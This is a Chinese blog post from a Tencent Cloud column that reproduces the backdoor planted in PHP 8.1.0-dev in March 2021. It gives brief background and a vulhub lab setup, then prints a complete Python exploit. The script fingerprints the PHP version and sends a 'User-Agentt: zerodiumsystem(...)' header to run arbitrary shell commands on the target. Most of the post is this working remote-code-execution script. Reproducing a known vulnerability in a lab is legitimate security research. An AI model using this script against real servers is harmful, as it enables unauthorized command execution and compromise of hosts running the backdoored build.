前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >PHP 8.1.0-dev 开发版本后门复现

PHP 8.1.0-dev 开发版本后门复现

作者头像
洛米唯熊
发布2021-08-24 11:37:18
5900
发布2021-08-24 11:37:18
举报
文章被收录于专栏:洛米唯熊洛米唯熊洛米唯熊

0x00:简介

PHP 8.1.0-dev 开发版本在2021年3月28日被植入后门,但是后门很快被发现并修正。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来执行任意代码。

0x01:搭建环境

https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor

然后访问本地地址

http://127.0.0.1:8080/

0x02:漏洞复现

神秘代码

#!/usr/bin/env python3
import requests
import argparse

from requests.models import parse_header_links 

s = requests.Session()

def checkTarget(args):
    r = s.get(args.url)    
    for h in r.headers.items():
        if "PHP/8.1.0-dev" in h[1]:
            return True
    return False


def execCmd(args):
    r = s.get(args.url, headers={"User-Agentt":"zerodiumsystem(\""+args.cmd+"\");"})
    res = r.text.split("<!DOCTYPE html>")[0]
    if not res:
        print("[-] No Results")
    else:
        print("[+] Results:")
    print(res.strip())


def main():

    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="Target URL (Eg: http://127.0.0.1:8080/)", required=True)
    parser.add_argument("-c", "--cmd", help="Command to execute (Eg: ls,id,whoami)", default="id")
    args = parser.parse_args()

    if checkTarget(args):
        execCmd(args)
    else:
        print("[!] Not Vulnerable or url error")
        exit(0)
    
if __name__ == "__main__":
    main()
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-05-31,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 洛米唯熊 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档